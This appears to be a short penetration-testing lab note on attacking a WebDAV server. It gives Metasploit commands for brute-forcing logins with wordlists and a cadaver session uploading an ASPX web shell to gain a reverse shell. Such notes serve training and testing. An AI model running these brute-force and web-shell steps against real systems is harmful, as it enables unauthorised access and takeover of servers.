WebDav
Brute Forcing Credentials
msfconsole -q
use auxiliary/scanner/http/http_login
set RHOSTS demo.ine.local
set AUTH_URI /webdav/
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
exploitAuthenticated Remote Execution:
cadaver 192.168.105.122
Authentication required for 192.168.105.122 on server `192.168.105.122':
Username: fmcsorley
Password:
dav:/> help
Available commands:
ls cd pwd put get mget mput
edit less mkcol cat delete rmcol copy
move lock unlock discover steal showlocks version
checkin checkout uncheckout history label propnames chexec
propget propdel propset search set open close
echo quit unset lcd lls lpwd logout
help describe about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/> upload
Unrecognised command. Type 'help' for a list of commands.
dav:/> put
The `put' command requires 1 argument:
put local [remote] : Upload local file
dav:/> put /home/kali/impacket/examples/shell.aspx
Uploading /home/kali/impacket/examples/shell.aspx to `/shell.aspx':
Progress: [=============================>] 100.0% of 3675 bytes succeeded.
With valid credentials we are able to log in and upload files to get a reverse shell.
Last updated